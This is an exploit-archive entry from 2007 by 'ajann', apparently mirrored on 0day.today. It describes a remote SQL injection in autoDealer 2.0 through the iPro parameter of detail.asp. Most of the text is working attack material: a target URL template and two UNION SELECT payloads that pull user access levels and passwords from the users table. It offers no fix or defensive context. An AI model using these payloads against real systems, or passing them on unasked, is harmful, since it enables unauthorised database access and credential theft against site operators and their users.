id: 1354
date: 01/01/2007
title: autoDealer <= 2.0 (detail.asp iPro) Remote SQL Injection Vulnerability
author: ajann
cves: 

======================================================================
autoDealer <= 2.0 (detail.asp iPro) Remote SQL Injection Vulnerability
======================================================================



*******************************************************************************
# Title   :  autoDealer <= 2.0 (iPro) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.aspsiteware.com
# $$      :  $60.00

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//detail.asp?iPro=[SQL]

Example:

//detail.asp?iPro=-1%20union%20select%200,0,U_ACCESS,0%20from%20users
//detail.asp?iPro=-1%20union%20select%200,0,U_PASSWORD,0%20from%20users

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!




#  0day.today [2023-03-27]  #